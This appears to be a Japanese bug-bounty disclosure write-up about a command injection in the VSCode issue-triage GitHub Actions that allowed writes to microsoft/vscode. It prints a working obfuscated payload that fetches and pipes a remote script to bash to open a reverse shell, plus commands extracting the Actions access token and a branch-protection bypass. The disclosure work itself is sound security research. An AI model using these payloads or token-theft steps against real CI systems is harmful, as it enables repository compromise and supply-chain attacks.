Microsoftは脆弱性の診断行為をセーフハーバーにより許可しています。
本記事は、そのセーフハーバーを遵守した上で発見/報告した脆弱性を解説したものであり、無許可の脆弱性診断行為を推奨する事を意図したものではありません。
Microsoftが運営/提供するサービスに脆弱性を発見した場合は、Microsoft Bug Bounty Programへ報告してください。
VSCodeのIssue管理機能に脆弱性が存在し、不適切な正規表現、認証の欠如、コマンドインジェクションを組み合わせることによりVSCodeのGitHubリポジトリに対する不正な書き込みが可能だった。
電車に乗っている際にふと思い立ってmicrosoft/vscode
を眺めていた所、CI用のスクリプトが別のリポジトリ(microsoft/vscode-github-triage-actions
)にまとめられていることに気がついた。
非常に暇だったのでそのスクリプトを眺めていた際に、以下のようなコードを発見した1:
exec(`git -C ./repo merge-base --is-ancestor ${commit} ${release}`, (err) => {
[...]
}),
commit
変数またはrelease
変数に任意の入力ができれば、コマンドインジェクションができるな、と思い追加で調査することにした。
電車の中でPCを広げるわけにもいかないため、スマホでGitHubの検索機能を用いてコードを読むことにした。
上記のコマンドインジェクションができそうな処理を含む関数の名前がreleaseContainsCommit
だったため、そのまま検索すると5件の検索結果が帰ってきた。
その内1件がテスト用のコード2、2件が上記の関数の定義3、2件がこの関数を使用しているコード4だった。
これらのコードの流れを軽く追ってみると、特定の条件5を満たすIssue内でそのIssueをクローズする要因となったコミットハッシュをgetClosingInfo
関数より取得し、releaseContainsCommit
へ渡していた。6(上記のcommit
変数)
getClosingInfo
関数では、Issueをクローズする際にコミットを関連付けし忘れた場合でも問題なくIssueの管理を続けられるように、\closedWith
というコマンドを用意していた7。
このコマンドは、\closedWith コミットハッシュ
といったような形式のコメントをIssueに対して追加することにより、特定のコミットハッシュをIssueと関連付けることができるのだが、このコマンドをコメント内から検索する正規表現8に問題があった。
/(?:\\|\/)closedWith (\S*)/
この正規表現は、\closedWith
または/closedWith
で始まり、その後ホワイトスペースが出てくるまでの文字列にマッチする。
ここでは、\closedWith コミットハッシュ
というコマンドにのみマッチすればよかったため、\S
の部分を[a-fA-F0-9]
にするべきだった。
また、この正規表現は文頭に\closedWith
がある必要がないため、Issueのコメントのどこかに\closedWith
という文字列を含められればコマンドとして認識されてしまう。
そのため、<!-- \closedWith コミットハッシュ -->
といったようなコメントをされた際に、コマンドを実行されたと認識できずにコマンドが実行されてしまう恐れがあった。
また、この関数内では本来行われるべき権限の確認が行われていなかった。microsoft/vscode
リポジトリ内では、以下のような形で\closedWith
コマンドを実行できるユーザーを絞っていた9が、この認証の欠如により権限を持たないユーザーがコミットの関連付けを行える状態となってしまっていた。
{
"type": "comment",
"name": "closedWith",
"allowUsers": [
"cleidigh",
"usernamehw",
"gjsjohnmurray",
"IllusionMH"
],
"action": "close",
"addLabel": "unreleased"
},
これらの脆弱性を用いることにより、\closedWith
コマンドの引数にある程度任意の内容が渡せ、その入力をコマンドインジェクションが存在する箇所へと渡せることがわかった。
つまり、特定の条件5を満たすIssueに対して\closedWith `ここにコマンド`
といったようなコメントを行えばGitHub Actions内で任意のコマンドを実行できるのだが、Issueが以下の検索クエリのどちらかに引っかかる必要があり、ラベル付けを行う権限が無い一般ユーザーが能動的に脆弱性を突くのは厳しい可能性があった。
`is:closed label:${this.notYetReleasedLabel}`
`is:closed label:${this.pendingReleaseLabel} label:${this.authorVerificationRequestedLabel}`
また、脆弱性が存在するauthor-verified
スクリプト及びrelease-pipeline
スクリプトを使用しているワークフローは3つ10あったが、そのうち2つは特定のラベルがIssueについている状態でそのIssueがクローズされた際や、Issueにラベル付けされた際などに発火するもので、能動的な悪用が困難な状態だった。
しかしながら、最後の一つ11はschedule
でワークフローを発火させており、毎日14時20分(UTC)になると以下のクエリに合致するIssueに対して上記の関連コミット検索が行われるように設定されていた。
is:closed label:awaiting-insiders-release label:author-verification-requested
この条件に合致するIssueを検索した所、脆弱性の調査時点で一件のIssue12が該当することがわかった。
このIssueを用いることにより、脆弱性を突けることがわかったため、実際に突いてみることにした。
前述の通り、\closedWith `コマンド`
のようなコメントを書き込むことにより脆弱性を突くことが出来る。
しかしながら、対象のIssueは公開されている状態であり、そのまま書き込んでしまうと他のユーザーに脆弱性の概要を把握され、悪用されてしまう可能性があった。
そのため、文中のどこかに\closedWith
が含まれていればいいという挙動を利用し、普通のコメントに偽装して脆弱性を突くことにした。
Does the next version fix this issue? <!-- \closedWith `ここにコマンド` -->
また、このタスクが実行されるのが14時20分(UTC)であり、JSTに直すと23時20分であるため、とても眠い中作業をすることになる可能性があった。
そのため、眠気による事故が起きないよう予め脆弱性を突いた後の動きをある程度決めてから行うことにした。(実際めっちゃ眠かった)
予め動きを決めておくためには、この脆弱性を突くことにより発生し得る影響を特定しなければならない。
幸いにも、CI内で使用されているスクリプト郡は全てGitHub上でホストされているため、実際に脆弱性を突く前にある程度正確な影響を把握することができた。
まず大前提として、GitHub Actionsはpull_request
イベント以外ではsecrets.GITHUB_TOKEN
にリポジトリに対する書き込み権限を持ったGitHub Access Tokenをセットする13。
次に、actions/checkout
はデフォルトでディスク上にsecrets.GITHUB_TOKEN
を残す14。
最後に、actions/checkout
を実行した後のステップではディスク上にsecrets.GITHUB_TOKEN
が残っている。
これにより、actions/checkout
を実行した後のステップで任意のコードを実行できた場合、発火元のイベントがpull_request
でなければGitHub Actionsを実行しているリポジトリに対して書き込み権限を得ることが出来る。
ここまでの考えに至った後、実際に作業状態になったのが大体18時頃だったため、ご飯を食べてお風呂に入る時間を除くと約4時間ほどで計画を練る必要があった。
作業を行う準備を終えた後、まず初めに、Issueのコメントで使用するPayloadを考えた。
GitHubのMarkdownのパース仕様上、コメントアウトの中では--
が使えず、また正規表現によりホワイトスペースが使用できないため、最終的なPayloadは以下のようになった。(冗長な所があると思うが、時間がなかったので許してほしい)
Does the next version fix this issue? <!-- \closedWith `eval${IFS}$(echo${IFS}'Y3VybCAiaHR0cHM6Ly9yeTB0YWsuZ2l0aHViLmlvL3BheWxvYWRzL2Q1MGNmMWRmYjJlNzQ5Y2RhYTQ2ZjBiOGQ1ZGEzMzFkLnNoIiB8IGJhc2g='|base64${IFS}-d)` -->
このPayloadでは、curl https://ry0tak.github.io/payloads/d50cf1dfb2e749cdaa46f0b8d5da331d.sh | bash
をBase64エンコードした物をデコードし、それをコマンドとして実行している。
現在は削除されているが、このリンク先のスクリプトはリバースシェルを張るものだったため、このコマンドが実行された時点で任意の操作をGitHub Actions上で行えるようになっていた。
次に、リバースシェルを張った後に実行するコマンドを考えた。actions/checkout
は、ローカルのGitリポジトリに対して適切に認証を行うための設定を自動で行う。
そのため、そのリポジトリを利用して無害なファイルをプッシュするのが最も簡単で良いという結論に至り、以下のようなコマンドを実行することにした。
cd repo
git config --global user.name "Ry0taK"
git config --global user.email "[email protected]"
echo -e "This is a PoC for my MSRC report. (No malicious intent here! This is not a phishing!)\nIt would be appreciated if you don't delete the commit history until the MSRC team reviewed my report. (This is 'Reliable & minimized proof-of-concept' defined here: https://www.microsoft.com/en-us/msrc/bounty-example-report-submission)\nIf you are a maintainer, please send me a message at Twitter (@ryotkak) with a proof of maintainer for quick fix." > ryotak.txt
git add ryotak.txt
git commit -m "Add MSRC PoC"
git push
最後に、脆弱性を突いた後すぐにMicrosoftへ報告できるように、予め脆弱性が突けたと仮定したレポートを作成し、コピペすればレポートが送信できる状態にしておいた。
23時20分(JST)に処理が走るため、23時15分ごろにコメントを追加した。15
その後、23時41分になってワークフローが実行され16、リバースシェルが張られた。
しかしながら、上記の手順でコマンドを実行した際に、master
ブランチにブランチ保護がかかっているというエラーが出てしまった。
そのため、慌てて以下のコマンドを実行しryotak
ブランチを新規に作成、プッシュした: https://github.com/microsoft/vscode/commit/2dadb25aeb01922fcc321ebba95bd0a95d12ec0a
git checkout -b ryotak
git push -u origin ryotak
その後、ブランチ保護を回避する方法を探すために、以下のコマンドを実行してGitHub Access Tokenを抽出した。
auth_conf=$(git config --get http.https://github.com/.extraheader)
encoded=$(echo $auth_conf | sed s/"AUTHORIZATION: basic "//)
decoded=$(echo $encoded | base64 -d | sed s/"x-access-token:"// | tr -d '\n')
echo $decoded
このトークンを用いて、ブランチ保護を確認した所、master
ブランチにはアカウントベースのマージ保護があり、ブランチ保護の回避は困難であることがわかった。
他の重要そうなブランチを調査した結果、リリースブランチに対してはアカウントベースのマージ保護が存在せず、書き込みアクセスを持つユーザー1名以上のApproveがあればプルリクエストをマージできることが判明した。
GitHub Actionsに付与されるトークンはgithub-actions
というBotユーザーのものであるため、プルリクエストのApproveを行うことができる。
これを用いることにより、リリースブランチに対して任意のコミットが出来ることを証明することができた: https://github.com/microsoft/vscode/pull/113596
今回の記事は、CIのスクリプト内に存在した脆弱性を紹介しました。
CIのスクリプトは、普段OSSの監査を行う際等にあまり気にしない箇所であったため、かなり印象的でした。
また、今回の脆弱性報告のプロセス中、Microsoft側の応答が非常に丁寧かつ迅速でとても好印象でした。
実際には行いませんでしたが、リポジトリに対する書き込み権限があったため、新規バージョンのリリース等も実行できたのではないかな、と思っています。
本記事に関する質問はTwitter(@ryotkak)へメッセージを投げてください。
日付 | 出来事 |
---|---|
2020/12/29 13時頃 | コマンドインジェクションを発見 |
2020/12/29 14時頃 | 脆弱性が突けそうであることを確認 |
2020/12/29 18時頃 | 帰宅した後、準備を開始 |
2020/12/29 21時頃 | 諸々の準備を完了 |
2020/12/29 23:15 | PayloadをIssueに書き込み |
2020/12/29 23:41 | GitHub Actions内からリバースシェルが張られる |
2020/12/29 23:41 | masterへプッシュできないことを確認 |
2020/12/29 23:45頃 | GitHub Actionsのトークンを入手 |
2020/12/29 23:50頃 | ブランチ保護に関する調査完了 |
2020/12/29 24時頃 | 脆弱性の影響範囲の特定 |
2020/12/29 24時頃 | 脆弱性の報告 |
2021/01/01 | 脆弱性の一時対応が完了 |
2021/01/05 | 脆弱性の修正が完了 |
2021/01/12 | 脆弱性の開示許可を求める |
2021/01/12 | 脆弱性の開示許可が出る |
2021/01/12 | 脆弱性の開示 |